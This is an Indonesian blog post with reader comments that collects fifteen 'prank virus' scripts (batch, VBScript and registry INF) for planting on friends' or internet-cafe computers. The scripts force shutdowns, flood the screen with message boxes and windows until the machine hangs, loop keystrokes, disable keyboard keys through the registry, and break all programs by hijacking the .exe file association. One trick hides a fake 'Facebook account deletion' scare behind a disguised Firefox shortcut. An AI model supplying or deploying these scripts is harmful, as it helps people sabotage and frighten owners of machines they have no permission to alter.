Rabu, 24 Agustus 2011

Trik Tips Hacker Super Jail dengan Notepad - Hack Komputer - Hack Facebook - Aplikasi Hacker - Membuat Jebakan Virus Berbahaya

 Trik Tips Hacker Super Jail dengan Notepad - Hack Komputer - Hack Facebook - Aplikasi Hacker - Membuat Jebakan Virus Berbahaya

kumpulan Cara Hacker Komputer, berikut ini merupakan cara hack komputer yang super jail. cara ini sangat cocok buat balas dendam dengan teman Anda, dibutuhkan Aplikasi Notepad untuk membuat Jebakan Atau Virus ringan hingga yang sangat mematikan. baiklah saya akan berbagi pengetahuan tentang Cara Hacker Komputer, berikut langkah-langkahnya : 

TRIK 1  - Membuat Forced Shoutdown
-------------------------------------------------
@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

-------------------------------------------------
simpan kode script yang berwarna Merah di Notepad dengan nama : xhack.BAT type file : All file
sebarkan File tersebut di Komputer teman Anda,
maka Komputer korban akan otomatis FORCED SHOUTDOWN


TRIK 2 - Membuat Tombol Caps Lock menyala terus-menerus
------------------------------------------------------------------
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
-------------------------------------------------------
seperti cara yang pertama, hanya berbeda kode script simpan kode yang berwarna biru di Notepad dengan nama : xhack.VBS type File : All File
sebarkan File berikut di Komputer korban maka, Tombol CAPSLOCK akan menyala terus-menerus
(bila dimatikan akan menyala lagi)


TRIK 3 - Membuat Pesan Jail mucul terus
------------------------------------------------------
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

------------------------------------------------------

simpan kode script yang berwarna hijau dengan nama xhack.BAT type file : All File
Cara ini sangat simple Jail, walaupun di close tab pesan ini masih muncul, kata katanya bisa diubah sesuai selera.








 
TRIK 4 - Jail dengan Membuka Tutup CD/DVD room
------------------------------------------------------
Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop
-------------------------------------------------------
simpan di Notepad kode berikut dengan nama : xhack.vbs type file : All File
maka DVD/CD roomnya akan membuka dan menutup otomatis,


TRIK 5 - Membuat script mucul terus menerus
-------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
-------------------------------------------------------
simpan kode berikut di Notepad dengan nama : xhack.vbs type file : All File
membuat script bermunculan terus menerus


TRIK 6 - Membuat Tombol Backspace menjadi eror - menekan terus menerus
--------------------------------------------------------
MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
---------------------------------------------------------- 
simpan kode script berikut di Notepad dengan nama : xhack.vbs type file : All File
maka Tombol Backspace akan eror dan menekan dengan sendirinya


TRIK 7 - Cara Membuat Pesan ' Komputer Anda Jelek Banget ' di Notepad/ Wordpad
-----------------------------------------------------------
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "
Komputer Anda Jelek Banget"
loop
----------------------------------------------------------- 
ganti kata Komputer Anda Jelek Banget dengan selera Anda, simpan di Notepad dengan nama : xhack.vbs


TRIK 8 - Cara Membuat Notepad Terbuka Otomatis - terus menerus
------------------------------------------------------------
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
------------------------------------------------------------ 
simpan di Notepad dengan nama : xhack.BAT
maka Notepad akan terbuka terus menerus




TRIK 9 - Membuat Notepad dengan Pesan Jail
-------------------------------------------------------------

WScript.Sleep 1800
WScript.Sleep 100
Set WshShell = WScript.CreateObject("WScript.Shell")
WshShell.Run "notepad"
WScript.Sleep 10
WshShell.AppActivate "Notepad"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "mu "
WScript.Sleep 50
WshShell.SendKeys "je"
WScript.Sleep 50
WshShell.SendKeys "le"
WScript.Sleep 50
WshShell.SendKeys "k "
WScript.Sleep 50
WshShell.SendKeys " se"
WScript.Sleep 50
WshShell.SendKeys "ka"
WScript.Sleep 50
WshShell.SendKeys "li"
WScript.Sleep 50
WshShell.SendKeys " y"
WScript.Sleep 50
WshShell.SendKeys "a"
WScript.Sleep 50
WshShell.SendKeys " h"
WScript.Sleep 50
WshShell.SendKeys "!"
WScript.Sleep 50
WshShell.SendKeys "!! "

-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.vbs 
ganti kode yang berwarna merah sesuai dengan selera anda.


TRIK 10 - Cara Membuat Memilih jawaban seperti Quiz di Notepad
-----------------------------------------------------------
@echo off
title quiz hari ini :)
:menu
cls
echo jika kamu kena virus apa
yang kamu lakukan
pause
echo pilih yang mana:
echo 1. matiin computer
echo 2. format aja
echo 3. bingung ahh
set input=nothing
set /p input=Choice:
if %input%==1 shutdown -s -t
30
if %input%==2 del c:xxx
if %input%==3 @ECHO off
msg * muka lo rusak
msg * ngaca dulu gih
msg * hayo lo,cpu lu gw acak2
msg * ud install ulang aja
msg * biar masalah nya kelar
@ECHO off
:top
START %SystemRoot%
system32notepad.exe
GOTO top -----------------------------------------------------------
simpan kode script berikut di Notepad dengan nama : xhack.BAT



TRIK 11 - Membuat Komputer Hang dengan Kode script Notepad
-------------------------------------------------------------

start

start

start

start

start

start

start

start

start

start

start

start
-----------------------------------------------------------
simpan di Notepad dengan nama : xhack.BAT
terus buat shortcut palsu terserah mau shortcut apa, aku saranin shortcutnya browser mozilla terus taro aja di desktop target
( efeknya akan membuka CDM yang banyak banget sampe layarnya keluar keluar )



TRIK 12 - Cara Mematikan Tombol Keyboard
-------------------------------------------------------------
1. Salin baris-baris kode (script) berikut , paste pada Notepad dan simpan dengan nama JAIL.INF

Langsung kita mulai saja :

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
AddReg =AIUEO

[AIUEO]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”,0×1,00,00,00,00,00,00,00,00,06,00,00,00,00,00,1e,00,00,00,12,00,00,00,
17,00,00,00,18,00,00,00,16,00,00,00,00,00

—————————————

2. Untuk menjalankannya, klik kanan nama file JAIL.INF dan pilih menu> Install

3. Log Off komputernya agar trik ini berfungsi.

NB :

Script diatas dimaksudkan untuk mematikan tombol A I U E O pada keyboard.

Untuk menormalkannya, silahkan salin script berikut :

—————————————

[Version]
Signature=”$Windows NT$”

[DefaultInstall]
DelReg =normal

[normal]
HKLM,”SYSTEM\CurrentControlSet\Control\Keyboard Layout”,”Scancode Map”

—————————————

—> Simpan dengan nama “NORMAL.INF
Klik kanan file ini, pilih >Install
Log Off komputernya.

sumber artikel hack : kidzoom


TRIK 13 - Software Buat Jahil - Nakal
--------------------------------------------------------

Software 1

Kalau yang ini nemu di Kaskus. Tapi dijamin seru banget.. Dan inilah fungsinya :
-freeze
-snow
-earthquake
-random colours
-mouse and lines
-puzzle
Lihat efeknya dibawah
  1. Puzzleimage
  2. Mouse And Linesimage
Masih banyak lagi deh.. Tapi jangan salah cara menghentikannya pun sulit loh.. Buka task manager gag bisa. Klik tombol start gag bisa.. So bagaimana, Cukup Tekan ESC doang kok.. hhee  Silahkan dicoba
Download : klik disini


Software 2

1Nah kalau yang ini namanya Key joke! Fungsinya bikin lampu disco nih.. Sama seperti script yang saya berikan dulu.  Tampilannya seperti yang disamping tuh.. Ini sih masih biasa gag kaya yang diatas tadi..
Ow iya tapi sebelumnya jangan kaget ye kalau ada pesan banyak seperti ini2Karena ini juga ulahnya ni software. Bisa di close kok..
Download :  Klik disini

Software 3

Wah kali ini parah banget nih. Bisa bikin stress juga. Sampai sekarang saya pun belum tau cara ngatasinnya. Nama softwarenya Stoerung, sepertinya bahasa jerman, pas install pun berbahasa jerman. Software ini meng-invert warna desktop kita berkali-kali secara berkala. Namun efeknya, menurut saya bisa merusak VGA card, dan ini juga bisa bikin komputer lemot.. Ini pun sama dengan software seblumnya. Dy mengeluarkan alert seperti software 2 namun lebih banyaka
Download : klik disini

Masih ada 46 software lagi yang bisa kalian download untuk ngerjain temen lw.. dan efeknya mantep2 juga loh! Lihat disini
http://www.rjlpranks.com/pranks/
sumber artikel :  kidzoom


TRIK 14 - Cara Merusak Komputer teman / Warnet
---------------------------------------------------------------
buka cmd(comand prompt), kalo belum tahu nyari dimana , klik start-run-ketik CMD-Lalu ketikan script ini
ASSOC.exe=.hank
lalu enter!
!!!!
program kayak ms.word/game ngambek jalan ! , n jika sudah puas banget jailnya dan mau ngembaliin-nya , tinggal buka CMD lagi. lalu ketik
ASSOC.exe=EXEFILE

---------------------------------------------------------------


TRIK 15 -  Cara Paling Jahil Jahat 
----------------------------------------------------------------

1. BUka program notepad atau biar cepet menu RUN ketik notepad lalu enter

2. Copy kode ini dan pastekan di notepad kamu

@echo off
msg * WARNING VIRUS DETECTED!!!!! AFTER 5 MINUTES YOUR FACEBOOK ACCOUNT WILL BE DELETED !!!!TO REMOVE THE VIRUS CLICK OK OR CLOSE THIS BOX!
PAUSE
shutdown -r -t 300 -c ” SORRY!!! YOUR FACEBOOK ACCOUNT ARE NOW BEING DELETED !!! PLEASE WAIT ………..”

3. Habis itu simpen file notepad ini dengan format *.bat = terserah mau diberi 

nama apa, misal : pacebuk.bat dan SAVE di Dekstop (Recommended)

4. Sekarang klik kanan desktopmu dan pilih New => Shortcut

5. Setelah ini akan muncul sebuah tampilan dan klik browse lalu cari lokasi file 

.bat yang kamu simpen tadi, misal tadi kamu save pada dekstop

6. Klik Next dan Rename dengan Mozilla Firefox (Untuk nama ini terserah kamu 

dan bebas bisa ganti dengan Opera Mini atau Google Chrome, ini hanya 

sebagai tipuan aja)

7.Bila semua langkah sudah oke, sekarang yang perlu kamu lakuin adalah 

mengubah icon .bat tadi dalam bentuk Mozilla Firefox (karena kita sering pakai 

Mozilla jadi pembahasannya pakai browser ini) .. Terus caranya gimana ?

Gampang.. tinggal kamu klik kanan file .bat tadi dan pilih change icon 

Gak nemu icon mozilla ? Coba deh low cari di Program Files => Mozilla Firefox

Nah sekarang virus facebookmu telah jadi dengan sempurna, kalau kamu ingin 

iseng nyoba tinggal di klik aja deh dan lihat perubahan yang akan terjadi .. 

Harusnya pasti sedikit kaget dan coba low bayangin kalau trik ini kamu 

praktekan di kompi temen kamu atau mungkin kompi kampus atau warnet.. 

what will happen ?  abis pastinya ..

NIH SCREENSHOOTNYA :





sumber : dzantxvegan

------------------------------------------------------------------------------------
Demikian Sedikit TRIK Jail, Hack dari saya yang buat jailin temen Anda
buka hacked-me  itu juga Trik Saya
x-hack.blogspot.com

15 komentar:

agustin's aggunk mengatakan...

Ada Trik lagi nih, JAIL KOMPUTER
caranya
• Tutup semua aplikasi kalo emang lagi jalanin aplikasi

• Biarkan computer hanya menampilkan windows desktop aja

• Masuk ke task manager dengan menekan ctrl+alt+del bersamaan

• Klik tab processes

• Cari explorer.exe

• Klik explorer.exe kemudian klik End Process
Ini akan membuat explorer berhenti bekerja, tampilan di monitor hanya menyisakan wallpaper saja (tanpa ada satupun icon aplikasi atau bahkan menu tab mulai dari Start dan lain sebagainya).

Bagi orang yg belom tau, hal ini bisa sangat membingungkan .Tampilan komputer hanya bersisa wallpaper saja, mouse pun tidak melakukan kerja (klik kanan maupun kiri tidak bekerja) hehehehehe. selamat mencoba
http://x-hack.blogspot.com/ TRIK JAIL

agustin's aggunk mengatakan...

cara Mengembalikan TRIK JAIL KOMPUTER
Ya sama saja dengan proses pertama :

• buka task manager (ctrl+alt+del)

• klik File kemudian pilih New task (Run….)

• pada kotak pilihan Open : ketikkan explorer.exe

• maka tampilan windows akan kembali seperti semula

hehehe mudah kan, http://x-hack.blogspot.com/ TRIK JAIL + HACKER

Raynol1991 mengatakan...

nice post,
kunjungi juga blog saya
http://hasilbrowsing.blogspot.com/

Endrian Famoy mengatakan...

mantap..
ane bagi link donk gan..

Agung Magrizal mengatakan...

Mas Admin Ada cara gak bwt kembaliin trik-trik jail diatas,apa dengan restart komputer aja trik diatas udah gak berjalan ???

Anonymous mengatakan...

gw pnya trik jail + hacker silahkan kunjungi blog saya y ^_^

www.adjiecheaterhacker.blogspot.com

Novan Gufran mengatakan...

Thanks infonya gan :-)
kunjungan baliknya yah...
www.novandiehard19.blogspot.com

enrico riski mengatakan...

gila,jail abis gan!!!
hehehe
tapi gimana cara menghentikannya gan????
saya tunggu balasannya!!!!
kunjung balik ya???
prel-blog.blogspot.com

wijayanti esti mengatakan...

gan,, cara ngatasin kalo kena virus trik yg ke 3 itu gimana ??? mohon bantuannya .... please ...

Syamsul97 mengatakan...

@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
GOTO BEGIN

semua make variabel yg mudah di paham i.
Di pernyataan diatas, ada variabel yg bernama "begin"
Nah, isi dari begin itu sendiri adalah :
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar

Cara kerjanya sederhana, dan pasti dilakukan secara berurutan. Setelah isi dari vari "begin" berakhir. Detailnya, setelah muncul pesan "biar masalah nya kelar". Proses dilanjutin ke perintah "goto". Yang artinya, perintah ke "goto blablabal".
Nah, kebetulan, perintah nya "goto begin". jadinya mirip kaya proses looping.
Jadi kalo di gambarin lewat skema :
begin -> pesan bla bla bal -> goto begin -> begin -> blabalba teruuuuuuuus sampe kiamat.
Cara buat berentiinnya gmpang. Buka bat file nya tadi.
Ganti komando "goto begin" jadi "end".
Maka skema konsep berupah jadi :
begin -> bla bla bla -> end
Selesai.
Skrip buat berentiin nya :
@ECHO off
:Begin
msg * muka kamu sangat jelek
msg * ngaca dulu gih,
msg * hayo lo,cpu lu gw acak acak
msg * udah install ulang aja
msg * biar masalah nya kelar
END

OZAN HACKER mengatakan...

Trik paling jahat...
Banting laptop atau PC temen kamu...
Pasti marah...
wkwkwkkwkw...

Syaikal Rahman mengatakan...

Klik aja di sin gani
ini trik supaya web yang kita inginkan tidak bisa terbuka di komputer agan..silahkan coba,pasti menarik..

HERBALPASUTRI mengatakan...

SUPER INCOME BACA DISINI http://www.mlmotomatis.com/netcom
http://superbisnisnet.blogspot.com/

Rizky Desalona mengatakan...

cara ngebaginya ketemen gimana gannn??....mohon kunjungannya jg ke rizkydesalona.blogspot.com bagi yang mau ngelancarin bhs inggris.

Dhenny Scout TKJ mengatakan...

cara ngembali'in ke awal gimana gan.???

Poskan Komentar

bagi yang punya TRIK JAIL + HACKER share aja di komentar

 
 
Copyright © x-hack
Blogger Theme by BloggerThemes Design by Diovo.com